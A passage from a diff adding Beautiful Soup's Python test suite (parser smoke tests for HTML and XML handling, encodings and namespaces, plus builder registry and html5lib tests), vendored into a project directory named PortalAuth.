"""Whitespace must be preserved in <pre> and <textarea> tags."""
|
||||
self.assertSoupEquals("<pre> </pre>")
|
||||
self.assertSoupEquals("<textarea> woo </textarea>")
|
||||
|
||||
def test_nested_inline_elements(self):
|
||||
"""Inline elements can be nested indefinitely."""
|
||||
b_tag = "<b>Inside a B tag</b>"
|
||||
self.assertSoupEquals(b_tag)
|
||||
|
||||
nested_b_tag = "<p>A <i>nested <b>tag</b></i></p>"
|
||||
self.assertSoupEquals(nested_b_tag)
|
||||
|
||||
double_nested_b_tag = "<p>A <a>doubly <i>nested <b>tag</b></i></a></p>"
|
||||
self.assertSoupEquals(nested_b_tag)
|
||||
|
||||
def test_nested_block_level_elements(self):
|
||||
"""Block elements can be nested."""
|
||||
soup = self.soup('<blockquote><p><b>Foo</b></p></blockquote>')
|
||||
blockquote = soup.blockquote
|
||||
self.assertEqual(blockquote.p.b.string, 'Foo')
|
||||
self.assertEqual(blockquote.b.string, 'Foo')
|
||||
|
||||
def test_correctly_nested_tables(self):
|
||||
"""One table can go inside another one."""
|
||||
markup = ('<table id="1">'
|
||||
'<tr>'
|
||||
"<td>Here's another table:"
|
||||
'<table id="2">'
|
||||
'<tr><td>foo</td></tr>'
|
||||
'</table></td>')
|
||||
|
||||
self.assertSoupEquals(
|
||||
markup,
|
||||
'<table id="1"><tr><td>Here\'s another table:'
|
||||
'<table id="2"><tr><td>foo</td></tr></table>'
|
||||
'</td></tr></table>')
|
||||
|
||||
self.assertSoupEquals(
|
||||
"<table><thead><tr><td>Foo</td></tr></thead>"
|
||||
"<tbody><tr><td>Bar</td></tr></tbody>"
|
||||
"<tfoot><tr><td>Baz</td></tr></tfoot></table>")
|
||||
|
||||
def test_deeply_nested_multivalued_attribute(self):
|
||||
# html5lib can set the attributes of the same tag many times
|
||||
# as it rearranges the tree. This has caused problems with
|
||||
# multivalued attributes.
|
||||
markup = '<table><div><div class="css"></div></div></table>'
|
||||
soup = self.soup(markup)
|
||||
self.assertEqual(["css"], soup.div.div['class'])
|
||||
|
||||
def test_multivalued_attribute_on_html(self):
|
||||
# html5lib uses a different API to set the attributes ot the
|
||||
# <html> tag. This has caused problems with multivalued
|
||||
# attributes.
|
||||
markup = '<html class="a b"></html>'
|
||||
soup = self.soup(markup)
|
||||
self.assertEqual(["a", "b"], soup.html['class'])
|
||||
|
||||
def test_angle_brackets_in_attribute_values_are_escaped(self):
|
||||
self.assertSoupEquals('<a b="<a>"></a>', '<a b="<a>"></a>')
|
||||
|
||||
def test_entities_in_attributes_converted_to_unicode(self):
|
||||
expect = u'<p id="pi\N{LATIN SMALL LETTER N WITH TILDE}ata"></p>'
|
||||
self.assertSoupEquals('<p id="piñata"></p>', expect)
|
||||
self.assertSoupEquals('<p id="piñata"></p>', expect)
|
||||
self.assertSoupEquals('<p id="piñata"></p>', expect)
|
||||
self.assertSoupEquals('<p id="piñata"></p>', expect)
|
||||
|
||||
def test_entities_in_text_converted_to_unicode(self):
|
||||
expect = u'<p>pi\N{LATIN SMALL LETTER N WITH TILDE}ata</p>'
|
||||
self.assertSoupEquals("<p>piñata</p>", expect)
|
||||
self.assertSoupEquals("<p>piñata</p>", expect)
|
||||
self.assertSoupEquals("<p>piñata</p>", expect)
|
||||
self.assertSoupEquals("<p>piñata</p>", expect)
|
||||
|
||||
def test_quot_entity_converted_to_quotation_mark(self):
|
||||
self.assertSoupEquals("<p>I said "good day!"</p>",
|
||||
'<p>I said "good day!"</p>')
|
||||
|
||||
def test_out_of_range_entity(self):
|
||||
expect = u"\N{REPLACEMENT CHARACTER}"
|
||||
self.assertSoupEquals("�", expect)
|
||||
self.assertSoupEquals("�", expect)
|
||||
self.assertSoupEquals("�", expect)
|
||||
|
||||
def test_multipart_strings(self):
|
||||
"Mostly to prevent a recurrence of a bug in the html5lib treebuilder."
|
||||
soup = self.soup("<html><h2>\nfoo</h2><p></p></html>")
|
||||
self.assertEqual("p", soup.h2.string.next_element.name)
|
||||
self.assertEqual("p", soup.p.name)
|
||||
self.assertConnectedness(soup)
|
||||
|
||||
def test_head_tag_between_head_and_body(self):
|
||||
"Prevent recurrence of a bug in the html5lib treebuilder."
|
||||
content = """<html><head></head>
|
||||
<link></link>
|
||||
<body>foo</body>
|
||||
</html>
|
||||
"""
|
||||
soup = self.soup(content)
|
||||
self.assertNotEqual(None, soup.html.body)
|
||||
self.assertConnectedness(soup)
|
||||
|
||||
def test_multiple_copies_of_a_tag(self):
|
||||
"Prevent recurrence of a bug in the html5lib treebuilder."
|
||||
content = """<!DOCTYPE html>
|
||||
<html>
|
||||
<body>
|
||||
<article id="a" >
|
||||
<div><a href="1"></div>
|
||||
<footer>
|
||||
<a href="2"></a>
|
||||
</footer>
|
||||
</article>
|
||||
</body>
|
||||
</html>
|
||||
"""
|
||||
soup = self.soup(content)
|
||||
self.assertConnectedness(soup.article)
|
||||
|
||||
def test_basic_namespaces(self):
|
||||
"""Parsers don't need to *understand* namespaces, but at the
|
||||
very least they should not choke on namespaces or lose
|
||||
data."""
|
||||
|
||||
markup = b'<html xmlns="http://www.w3.org/1999/xhtml" xmlns:mathml="http://www.w3.org/1998/Math/MathML" xmlns:svg="http://www.w3.org/2000/svg"><head></head><body><mathml:msqrt>4</mathml:msqrt><b svg:fill="red"></b></body></html>'
|
||||
soup = self.soup(markup)
|
||||
self.assertEqual(markup, soup.encode())
|
||||
html = soup.html
|
||||
self.assertEqual('http://www.w3.org/1999/xhtml', soup.html['xmlns'])
|
||||
self.assertEqual(
|
||||
'http://www.w3.org/1998/Math/MathML', soup.html['xmlns:mathml'])
|
||||
self.assertEqual(
|
||||
'http://www.w3.org/2000/svg', soup.html['xmlns:svg'])
|
||||
|
||||
def test_multivalued_attribute_value_becomes_list(self):
|
||||
markup = b'<a class="foo bar">'
|
||||
soup = self.soup(markup)
|
||||
self.assertEqual(['foo', 'bar'], soup.a['class'])
|
||||
|
||||
#
|
||||
# Generally speaking, tests below this point are more tests of
|
||||
# Beautiful Soup than tests of the tree builders. But parsers are
|
||||
# weird, so we run these tests separately for every tree builder
|
||||
# to detect any differences between them.
|
||||
#
|
||||
|
||||
def test_can_parse_unicode_document(self):
|
||||
# A seemingly innocuous document... but it's in Unicode! And
|
||||
# it contains characters that can't be represented in the
|
||||
# encoding found in the declaration! The horror!
|
||||
markup = u'<html><head><meta encoding="euc-jp"></head><body>Sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!</body>'
|
||||
soup = self.soup(markup)
|
||||
self.assertEqual(u'Sacr\xe9 bleu!', soup.body.string)
|
||||
|
||||
def test_soupstrainer(self):
|
||||
"""Parsers should be able to work with SoupStrainers."""
|
||||
strainer = SoupStrainer("b")
|
||||
soup = self.soup("A <b>bold</b> <meta/> <i>statement</i>",
|
||||
parse_only=strainer)
|
||||
self.assertEqual(soup.decode(), "<b>bold</b>")
|
||||
|
||||
def test_single_quote_attribute_values_become_double_quotes(self):
|
||||
self.assertSoupEquals("<foo attr='bar'></foo>",
|
||||
'<foo attr="bar"></foo>')
|
||||
|
||||
def test_attribute_values_with_nested_quotes_are_left_alone(self):
|
||||
text = """<foo attr='bar "brawls" happen'>a</foo>"""
|
||||
self.assertSoupEquals(text)
|
||||
|
||||
def test_attribute_values_with_double_nested_quotes_get_quoted(self):
|
||||
text = """<foo attr='bar "brawls" happen'>a</foo>"""
|
||||
soup = self.soup(text)
|
||||
soup.foo['attr'] = 'Brawls happen at "Bob\'s Bar"'
|
||||
self.assertSoupEquals(
|
||||
soup.foo.decode(),
|
||||
"""<foo attr="Brawls happen at "Bob\'s Bar"">a</foo>""")
|
||||
|
||||
def test_ampersand_in_attribute_value_gets_escaped(self):
|
||||
self.assertSoupEquals('<this is="really messed up & stuff"></this>',
|
||||
'<this is="really messed up & stuff"></this>')
|
||||
|
||||
self.assertSoupEquals(
|
||||
'<a href="http://example.org?a=1&b=2;3">foo</a>',
|
||||
'<a href="http://example.org?a=1&b=2;3">foo</a>')
|
||||
|
||||
def test_escaped_ampersand_in_attribute_value_is_left_alone(self):
|
||||
self.assertSoupEquals('<a href="http://example.org?a=1&b=2;3"></a>')
|
||||
|
||||
def test_entities_in_strings_converted_during_parsing(self):
|
||||
# Both XML and HTML entities are converted to Unicode characters
|
||||
# during parsing.
|
||||
text = "<p><<sacré bleu!>></p>"
|
||||
expected = u"<p><<sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!>></p>"
|
||||
self.assertSoupEquals(text, expected)
|
||||
|
||||
def test_smart_quotes_converted_on_the_way_in(self):
|
||||
# Microsoft smart quotes are converted to Unicode characters during
|
||||
# parsing.
|
||||
quote = b"<p>\x91Foo\x92</p>"
|
||||
soup = self.soup(quote)
|
||||
self.assertEqual(
|
||||
soup.p.string,
|
||||
u"\N{LEFT SINGLE QUOTATION MARK}Foo\N{RIGHT SINGLE QUOTATION MARK}")
|
||||
|
||||
def test_non_breaking_spaces_converted_on_the_way_in(self):
|
||||
soup = self.soup("<a> </a>")
|
||||
self.assertEqual(soup.a.string, u"\N{NO-BREAK SPACE}" * 2)
|
||||
|
||||
def test_entities_converted_on_the_way_out(self):
|
||||
text = "<p><<sacré bleu!>></p>"
|
||||
expected = u"<p><<sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!>></p>".encode("utf-8")
|
||||
soup = self.soup(text)
|
||||
self.assertEqual(soup.p.encode("utf-8"), expected)
|
||||
|
||||
def test_real_iso_latin_document(self):
|
||||
# Smoke test of interrelated functionality, using an
|
||||
# easy-to-understand document.
|
||||
|
||||
# Here it is in Unicode. Note that it claims to be in ISO-Latin-1.
|
||||
unicode_html = u'<html><head><meta content="text/html; charset=ISO-Latin-1" http-equiv="Content-type"/></head><body><p>Sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!</p></body></html>'
|
||||
|
||||
# That's because we're going to encode it into ISO-Latin-1, and use
|
||||
# that to test.
|
||||
iso_latin_html = unicode_html.encode("iso-8859-1")
|
||||
|
||||
# Parse the ISO-Latin-1 HTML.
|
||||
soup = self.soup(iso_latin_html)
|
||||
# Encode it to UTF-8.
|
||||
result = soup.encode("utf-8")
|
||||
|
||||
# What do we expect the result to look like? Well, it would
|
||||
# look like unicode_html, except that the META tag would say
|
||||
# UTF-8 instead of ISO-Latin-1.
|
||||
expected = unicode_html.replace("ISO-Latin-1", "utf-8")
|
||||
|
||||
# And, of course, it would be in UTF-8, not Unicode.
|
||||
expected = expected.encode("utf-8")
|
||||
|
||||
# Ta-da!
|
||||
self.assertEqual(result, expected)
|
||||
|
||||
def test_real_shift_jis_document(self):
|
||||
# Smoke test to make sure the parser can handle a document in
|
||||
# Shift-JIS encoding, without choking.
|
||||
shift_jis_html = (
|
||||
b'<html><head></head><body><pre>'
|
||||
b'\x82\xb1\x82\xea\x82\xcdShift-JIS\x82\xc5\x83R\x81[\x83f'
|
||||
b'\x83B\x83\x93\x83O\x82\xb3\x82\xea\x82\xbd\x93\xfa\x96{\x8c'
|
||||
b'\xea\x82\xcc\x83t\x83@\x83C\x83\x8b\x82\xc5\x82\xb7\x81B'
|
||||
b'</pre></body></html>')
|
||||
unicode_html = shift_jis_html.decode("shift-jis")
|
||||
soup = self.soup(unicode_html)
|
||||
|
||||
# Make sure the parse tree is correctly encoded to various
|
||||
# encodings.
|
||||
self.assertEqual(soup.encode("utf-8"), unicode_html.encode("utf-8"))
|
||||
self.assertEqual(soup.encode("euc_jp"), unicode_html.encode("euc_jp"))
|
||||
|
||||
def test_real_hebrew_document(self):
|
||||
# A real-world test to make sure we can convert ISO-8859-9 (a
|
||||
# Hebrew encoding) to UTF-8.
|
||||
hebrew_document = b'<html><head><title>Hebrew (ISO 8859-8) in Visual Directionality</title></head><body><h1>Hebrew (ISO 8859-8) in Visual Directionality</h1>\xed\xe5\xec\xf9</body></html>'
|
||||
soup = self.soup(
|
||||
hebrew_document, from_encoding="iso8859-8")
|
||||
self.assertEqual(soup.original_encoding, 'iso8859-8')
|
||||
self.assertEqual(
|
||||
soup.encode('utf-8'),
|
||||
hebrew_document.decode("iso8859-8").encode("utf-8"))
|
||||
|
||||
def test_meta_tag_reflects_current_encoding(self):
|
||||
# Here's the <meta> tag saying that a document is
|
||||
# encoded in Shift-JIS.
|
||||
meta_tag = ('<meta content="text/html; charset=x-sjis" '
|
||||
'http-equiv="Content-type"/>')
|
||||
|
||||
# Here's a document incorporating that meta tag.
|
||||
shift_jis_html = (
|
||||
'<html><head>\n%s\n'
|
||||
'<meta http-equiv="Content-language" content="ja"/>'
|
||||
'</head><body>Shift-JIS markup goes here.') % meta_tag
|
||||
soup = self.soup(shift_jis_html)
|
||||
|
||||
# Parse the document, and the charset is seemingly unaffected.
|
||||
parsed_meta = soup.find('meta', {'http-equiv': 'Content-type'})
|
||||
content = parsed_meta['content']
|
||||
self.assertEqual('text/html; charset=x-sjis', content)
|
||||
|
||||
# But that value is actually a ContentMetaAttributeValue object.
|
||||
self.assertTrue(isinstance(content, ContentMetaAttributeValue))
|
||||
|
||||
# And it will take on a value that reflects its current
|
||||
# encoding.
|
||||
self.assertEqual('text/html; charset=utf8', content.encode("utf8"))
|
||||
|
||||
# For the rest of the story, see TestSubstitutions in
|
||||
# test_tree.py.
|
||||
|
||||
def test_html5_style_meta_tag_reflects_current_encoding(self):
|
||||
# Here's the <meta> tag saying that a document is
|
||||
# encoded in Shift-JIS.
|
||||
meta_tag = ('<meta id="encoding" charset="x-sjis" />')
|
||||
|
||||
# Here's a document incorporating that meta tag.
|
||||
shift_jis_html = (
|
||||
'<html><head>\n%s\n'
|
||||
'<meta http-equiv="Content-language" content="ja"/>'
|
||||
'</head><body>Shift-JIS markup goes here.') % meta_tag
|
||||
soup = self.soup(shift_jis_html)
|
||||
|
||||
# Parse the document, and the charset is seemingly unaffected.
|
||||
parsed_meta = soup.find('meta', id="encoding")
|
||||
charset = parsed_meta['charset']
|
||||
self.assertEqual('x-sjis', charset)
|
||||
|
||||
# But that value is actually a CharsetMetaAttributeValue object.
|
||||
self.assertTrue(isinstance(charset, CharsetMetaAttributeValue))
|
||||
|
||||
# And it will take on a value that reflects its current
|
||||
# encoding.
|
||||
self.assertEqual('utf8', charset.encode("utf8"))
|
||||
|
||||
def test_tag_with_no_attributes_can_have_attributes_added(self):
|
||||
data = self.soup("<a>text</a>")
|
||||
data.a['foo'] = 'bar'
|
||||
self.assertEqual('<a foo="bar">text</a>', data.a.decode())
|
||||
|
||||
class XMLTreeBuilderSmokeTest(object):
|
||||
|
||||
def test_pickle_and_unpickle_identity(self):
|
||||
# Pickling a tree, then unpickling it, yields a tree identical
|
||||
# to the original.
|
||||
tree = self.soup("<a><b>foo</a>")
|
||||
dumped = pickle.dumps(tree, 2)
|
||||
loaded = pickle.loads(dumped)
|
||||
self.assertEqual(loaded.__class__, BeautifulSoup)
|
||||
self.assertEqual(loaded.decode(), tree.decode())
|
||||
|
||||
def test_docstring_generated(self):
|
||||
soup = self.soup("<root/>")
|
||||
self.assertEqual(
|
||||
soup.encode(), b'<?xml version="1.0" encoding="utf-8"?>\n<root/>')
|
||||
|
||||
def test_real_xhtml_document(self):
|
||||
"""A real XHTML document should come out *exactly* the same as it went in."""
|
||||
markup = b"""<?xml version="1.0" encoding="utf-8"?>
|
||||
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
|
||||
<html xmlns="http://www.w3.org/1999/xhtml">
|
||||
<head><title>Hello.</title></head>
|
||||
<body>Goodbye.</body>
|
||||
</html>"""
|
||||
soup = self.soup(markup)
|
||||
self.assertEqual(
|
||||
soup.encode("utf-8"), markup)
|
||||
|
||||
def test_formatter_processes_script_tag_for_xml_documents(self):
|
||||
doc = """
|
||||
<script type="text/javascript">
|
||||
</script>
|
||||
"""
|
||||
soup = BeautifulSoup(doc, "lxml-xml")
|
||||
# lxml would have stripped this while parsing, but we can add
|
||||
# it later.
|
||||
soup.script.string = 'console.log("< < hey > > ");'
|
||||
encoded = soup.encode()
|
||||
self.assertTrue(b"< < hey > >" in encoded)
|
||||
|
||||
def test_can_parse_unicode_document(self):
|
||||
markup = u'<?xml version="1.0" encoding="euc-jp"><root>Sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!</root>'
|
||||
soup = self.soup(markup)
|
||||
self.assertEqual(u'Sacr\xe9 bleu!', soup.root.string)
|
||||
|
||||
def test_popping_namespaced_tag(self):
|
||||
markup = '<rss xmlns:dc="foo"><dc:creator>b</dc:creator><dc:date>2012-07-02T20:33:42Z</dc:date><dc:rights>c</dc:rights><image>d</image></rss>'
|
||||
soup = self.soup(markup)
|
||||
self.assertEqual(
|
||||
unicode(soup.rss), markup)
|
||||
|
||||
def test_docstring_includes_correct_encoding(self):
|
||||
soup = self.soup("<root/>")
|
||||
self.assertEqual(
|
||||
soup.encode("latin1"),
|
||||
b'<?xml version="1.0" encoding="latin1"?>\n<root/>')
|
||||
|
||||
def test_large_xml_document(self):
|
||||
"""A large XML document should come out the same as it went in."""
|
||||
markup = (b'<?xml version="1.0" encoding="utf-8"?>\n<root>'
|
||||
+ b'0' * (2**12)
|
||||
+ b'</root>')
|
||||
soup = self.soup(markup)
|
||||
self.assertEqual(soup.encode("utf-8"), markup)
|
||||
|
||||
|
||||
def test_tags_are_empty_element_if_and_only_if_they_are_empty(self):
|
||||
self.assertSoupEquals("<p>", "<p/>")
|
||||
self.assertSoupEquals("<p>foo</p>")
|
||||
|
||||
def test_namespaces_are_preserved(self):
|
||||
markup = '<root xmlns:a="http://example.com/" xmlns:b="http://example.net/"><a:foo>This tag is in the a namespace</a:foo><b:foo>This tag is in the b namespace</b:foo></root>'
|
||||
soup = self.soup(markup)
|
||||
root = soup.root
|
||||
self.assertEqual("http://example.com/", root['xmlns:a'])
|
||||
self.assertEqual("http://example.net/", root['xmlns:b'])
|
||||
|
||||
def test_closing_namespaced_tag(self):
|
||||
markup = '<p xmlns:dc="http://purl.org/dc/elements/1.1/"><dc:date>20010504</dc:date></p>'
|
||||
soup = self.soup(markup)
|
||||
self.assertEqual(unicode(soup.p), markup)
|
||||
|
||||
def test_namespaced_attributes(self):
|
||||
markup = '<foo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><bar xsi:schemaLocation="http://www.example.com"/></foo>'
|
||||
soup = self.soup(markup)
|
||||
self.assertEqual(unicode(soup.foo), markup)
|
||||
|
||||
def test_namespaced_attributes_xml_namespace(self):
|
||||
markup = '<foo xml:lang="fr">bar</foo>'
|
||||
soup = self.soup(markup)
|
||||
self.assertEqual(unicode(soup.foo), markup)
|
||||
|
||||
class HTML5TreeBuilderSmokeTest(HTMLTreeBuilderSmokeTest):
|
||||
"""Smoke test for a tree builder that supports HTML5."""
|
||||
|
||||
def test_real_xhtml_document(self):
|
||||
# Since XHTML is not HTML5, HTML5 parsers are not tested to handle
|
||||
# XHTML documents in any particular way.
|
||||
pass
|
||||
|
||||
def test_html_tags_have_namespace(self):
|
||||
markup = "<a>"
|
||||
soup = self.soup(markup)
|
||||
self.assertEqual("http://www.w3.org/1999/xhtml", soup.a.namespace)
|
||||
|
||||
def test_svg_tags_have_namespace(self):
|
||||
markup = '<svg><circle/></svg>'
|
||||
soup = self.soup(markup)
|
||||
namespace = "http://www.w3.org/2000/svg"
|
||||
self.assertEqual(namespace, soup.svg.namespace)
|
||||
self.assertEqual(namespace, soup.circle.namespace)
|
||||
|
||||
|
||||
def test_mathml_tags_have_namespace(self):
|
||||
markup = '<math><msqrt>5</msqrt></math>'
|
||||
soup = self.soup(markup)
|
||||
namespace = 'http://www.w3.org/1998/Math/MathML'
|
||||
self.assertEqual(namespace, soup.math.namespace)
|
||||
self.assertEqual(namespace, soup.msqrt.namespace)
|
||||
|
||||
def test_xml_declaration_becomes_comment(self):
|
||||
markup = '<?xml version="1.0" encoding="utf-8"?><html></html>'
|
||||
soup = self.soup(markup)
|
||||
self.assertTrue(isinstance(soup.contents[0], Comment))
|
||||
self.assertEqual(soup.contents[0], '?xml version="1.0" encoding="utf-8"?')
|
||||
self.assertEqual("html", soup.contents[0].next_element.name)
|
||||
|
||||
def skipIf(condition, reason):
|
||||
def nothing(test, *args, **kwargs):
|
||||
return None
|
||||
|
||||
def decorator(test_item):
|
||||
if condition:
|
||||
return nothing
|
||||
else:
|
||||
return test_item
|
||||
|
||||
return decorator
|
||||
1
PortalAuth/includes/scripts/libs/bs4/tests/__init__.py
Executable file
1
PortalAuth/includes/scripts/libs/bs4/tests/__init__.py
Executable file
@@ -0,0 +1 @@
|
||||
"The beautifulsoup tests."
|
||||
147
PortalAuth/includes/scripts/libs/bs4/tests/test_builder_registry.py
Executable file
147
PortalAuth/includes/scripts/libs/bs4/tests/test_builder_registry.py
Executable file
@@ -0,0 +1,147 @@
|
||||
"""Tests of the builder registry."""
|
||||
|
||||
import unittest
|
||||
import warnings
|
||||
|
||||
from bs4 import BeautifulSoup
|
||||
from bs4.builder import (
|
||||
builder_registry as registry,
|
||||
HTMLParserTreeBuilder,
|
||||
TreeBuilderRegistry,
|
||||
)
|
||||
|
||||
try:
|
||||
from bs4.builder import HTML5TreeBuilder
|
||||
HTML5LIB_PRESENT = True
|
||||
except ImportError:
|
||||
HTML5LIB_PRESENT = False
|
||||
|
||||
try:
|
||||
from bs4.builder import (
|
||||
LXMLTreeBuilderForXML,
|
||||
LXMLTreeBuilder,
|
||||
)
|
||||
LXML_PRESENT = True
|
||||
except ImportError:
|
||||
LXML_PRESENT = False
|
||||
|
||||
|
||||
class BuiltInRegistryTest(unittest.TestCase):
|
||||
"""Test the built-in registry with the default builders registered."""
|
||||
|
||||
def test_combination(self):
|
||||
if LXML_PRESENT:
|
||||
self.assertEqual(registry.lookup('fast', 'html'),
|
||||
LXMLTreeBuilder)
|
||||
|
||||
if LXML_PRESENT:
|
||||
self.assertEqual(registry.lookup('permissive', 'xml'),
|
||||
LXMLTreeBuilderForXML)
|
||||
self.assertEqual(registry.lookup('strict', 'html'),
|
||||
HTMLParserTreeBuilder)
|
||||
if HTML5LIB_PRESENT:
|
||||
self.assertEqual(registry.lookup('html5lib', 'html'),
|
||||
HTML5TreeBuilder)
|
||||
|
||||
def test_lookup_by_markup_type(self):
|
||||
if LXML_PRESENT:
|
||||
self.assertEqual(registry.lookup('html'), LXMLTreeBuilder)
|
||||
self.assertEqual(registry.lookup('xml'), LXMLTreeBuilderForXML)
|
||||
else:
|
||||
self.assertEqual(registry.lookup('xml'), None)
|
||||
if HTML5LIB_PRESENT:
|
||||
self.assertEqual(registry.lookup('html'), HTML5TreeBuilder)
|
||||
else:
|
||||
self.assertEqual(registry.lookup('html'), HTMLParserTreeBuilder)
|
||||
|
||||
def test_named_library(self):
|
||||
if LXML_PRESENT:
|
||||
self.assertEqual(registry.lookup('lxml', 'xml'),
|
||||
LXMLTreeBuilderForXML)
|
||||
self.assertEqual(registry.lookup('lxml', 'html'),
|
||||
LXMLTreeBuilder)
|
||||
if HTML5LIB_PRESENT:
|
||||
self.assertEqual(registry.lookup('html5lib'),
|
||||
HTML5TreeBuilder)
|
||||
|
||||
self.assertEqual(registry.lookup('html.parser'),
|
||||
HTMLParserTreeBuilder)
|
||||
|
||||
def test_beautifulsoup_constructor_does_lookup(self):
|
||||
|
||||
with warnings.catch_warnings(record=True) as w:
|
||||
# This will create a warning about not explicitly
|
||||
# specifying a parser, but we'll ignore it.
|
||||
|
||||
# You can pass in a string.
|
||||
BeautifulSoup("", features="html")
|
||||
# Or a list of strings.
|
||||
BeautifulSoup("", features=["html", "fast"])
|
||||
|
||||
# You'll get an exception if BS can't find an appropriate
|
||||
# builder.
|
||||
self.assertRaises(ValueError, BeautifulSoup,
|
||||
"", features="no-such-feature")
|
||||
|
||||
class RegistryTest(unittest.TestCase):
|
||||
"""Test the TreeBuilderRegistry class in general."""
|
||||
|
||||
def setUp(self):
|
||||
self.registry = TreeBuilderRegistry()
|
||||
|
||||
def builder_for_features(self, *feature_list):
|
||||
cls = type('Builder_' + '_'.join(feature_list),
|
||||
(object,), {'features' : feature_list})
|
||||
|
||||
self.registry.register(cls)
|
||||
return cls
|
||||
|
||||
def test_register_with_no_features(self):
|
||||
builder = self.builder_for_features()
|
||||
|
||||
# Since the builder advertises no features, you can't find it
|
||||
# by looking up features.
|
||||
self.assertEqual(self.registry.lookup('foo'), None)
|
||||
|
||||
# But you can find it by doing a lookup with no features, if
|
||||
# this happens to be the only registered builder.
|
||||
self.assertEqual(self.registry.lookup(), builder)
|
||||
|
||||
def test_register_with_features_makes_lookup_succeed(self):
|
||||
builder = self.builder_for_features('foo', 'bar')
|
||||
self.assertEqual(self.registry.lookup('foo'), builder)
|
||||
self.assertEqual(self.registry.lookup('bar'), builder)
|
||||
|
||||
def test_lookup_fails_when_no_builder_implements_feature(self):
|
||||
builder = self.builder_for_features('foo', 'bar')
|
||||
self.assertEqual(self.registry.lookup('baz'), None)
|
||||
|
||||
def test_lookup_gets_most_recent_registration_when_no_feature_specified(self):
|
||||
builder1 = self.builder_for_features('foo')
|
||||
builder2 = self.builder_for_features('bar')
|
||||
self.assertEqual(self.registry.lookup(), builder2)
|
||||
|
||||
def test_lookup_fails_when_no_tree_builders_registered(self):
|
||||
self.assertEqual(self.registry.lookup(), None)
|
||||
|
||||
def test_lookup_gets_most_recent_builder_supporting_all_features(self):
|
||||
has_one = self.builder_for_features('foo')
|
||||
has_the_other = self.builder_for_features('bar')
|
||||
has_both_early = self.builder_for_features('foo', 'bar', 'baz')
|
||||
has_both_late = self.builder_for_features('foo', 'bar', 'quux')
|
||||
lacks_one = self.builder_for_features('bar')
|
||||
has_the_other = self.builder_for_features('foo')
|
||||
|
||||
# There are two builders featuring 'foo' and 'bar', but
|
||||
# the one that also features 'quux' was registered later.
|
||||
self.assertEqual(self.registry.lookup('foo', 'bar'),
|
||||
has_both_late)
|
||||
|
||||
# There is only one builder featuring 'foo', 'bar', and 'baz'.
|
||||
self.assertEqual(self.registry.lookup('foo', 'bar', 'baz'),
|
||||
has_both_early)
|
||||
|
||||
def test_lookup_fails_when_cannot_reconcile_requested_features(self):
|
||||
builder1 = self.builder_for_features('foo', 'bar')
|
||||
builder2 = self.builder_for_features('foo', 'baz')
|
||||
self.assertEqual(self.registry.lookup('bar', 'baz'), None)
|
||||
36
PortalAuth/includes/scripts/libs/bs4/tests/test_docs.py
Executable file
36
PortalAuth/includes/scripts/libs/bs4/tests/test_docs.py
Executable file
@@ -0,0 +1,36 @@
|
||||
"Test harness for doctests."
|
||||
|
||||
# pylint: disable-msg=E0611,W0142
|
||||
|
||||
__metaclass__ = type
|
||||
__all__ = [
|
||||
'additional_tests',
|
||||
]
|
||||
|
||||
import atexit
|
||||
import doctest
|
||||
import os
|
||||
#from pkg_resources import (
|
||||
# resource_filename, resource_exists, resource_listdir, cleanup_resources)
|
||||
import unittest
|
||||
|
||||
DOCTEST_FLAGS = (
|
||||
doctest.ELLIPSIS |
|
||||
doctest.NORMALIZE_WHITESPACE |
|
||||
doctest.REPORT_NDIFF)
|
||||
|
||||
|
||||
# def additional_tests():
|
||||
# "Run the doc tests (README.txt and docs/*, if any exist)"
|
||||
# doctest_files = [
|
||||
# os.path.abspath(resource_filename('bs4', 'README.txt'))]
|
||||
# if resource_exists('bs4', 'docs'):
|
||||
# for name in resource_listdir('bs4', 'docs'):
|
||||
# if name.endswith('.txt'):
|
||||
# doctest_files.append(
|
||||
# os.path.abspath(
|
||||
# resource_filename('bs4', 'docs/%s' % name)))
|
||||
# kwargs = dict(module_relative=False, optionflags=DOCTEST_FLAGS)
|
||||
# atexit.register(cleanup_resources)
|
||||
# return unittest.TestSuite((
|
||||
# doctest.DocFileSuite(*doctest_files, **kwargs)))
|
||||
91
PortalAuth/includes/scripts/libs/bs4/tests/test_html5lib.py
Executable file
91
PortalAuth/includes/scripts/libs/bs4/tests/test_html5lib.py
Executable file
@@ -0,0 +1,91 @@
|
||||
"""Tests to ensure that the html5lib tree builder generates good trees."""
|
||||
|
||||
import warnings
|
||||
|
||||
try:
|
||||
from bs4.builder import HTML5TreeBuilder
|
||||
HTML5LIB_PRESENT = True
|
||||
except ImportError, e:
|
||||
HTML5LIB_PRESENT = False
|
||||
from bs4.element import SoupStrainer
|
||||
from bs4.testing import (
|
||||
HTML5TreeBuilderSmokeTest,
|
||||
SoupTest,
|
||||
skipIf,
|
||||
)
|
||||
|
||||
@skipIf(
|
||||
not HTML5LIB_PRESENT,
|
||||
"html5lib seems not to be present, not testing its tree builder.")
|
||||
class HTML5LibBuilderSmokeTest(SoupTest, HTML5TreeBuilderSmokeTest):
|
||||
"""See ``HTML5TreeBuilderSmokeTest``."""
|
||||
|
||||
@property
|
||||
def default_builder(self):
|
||||
return HTML5TreeBuilder()
|
||||
|
||||
def test_soupstrainer(self):
|
||||
# The html5lib tree builder does not support SoupStrainers.
|
||||
strainer = SoupStrainer("b")
|
||||
markup = "<p>A <b>bold</b> statement.</p>"
|
||||
with warnings.catch_warnings(record=True) as w:
|
||||
soup = self.soup(markup, parse_only=strainer)
|
||||
self.assertEqual(
|
||||
soup.decode(), self.document_for(markup))
|
||||
|
||||
self.assertTrue(
|
||||
"the html5lib tree builder doesn't support parse_only" in
|
||||
str(w[0].message))
|
||||
|
||||
def test_correctly_nested_tables(self):
|
||||
"""html5lib inserts <tbody> tags where other parsers don't."""
|
||||
markup = ('<table id="1">'
|
||||
'<tr>'
|
||||
"<td>Here's another table:"
|
||||
'<table id="2">'
|
||||
'<tr><td>foo</td></tr>'
|
||||
'</table></td>')
|
||||
|
||||
self.assertSoupEquals(
|
||||
markup,
|
||||
'<table id="1"><tbody><tr><td>Here\'s another table:'
|
||||
'<table id="2"><tbody><tr><td>foo</td></tr></tbody></table>'
|
||||
'</td></tr></tbody></table>')
|
||||
|
||||
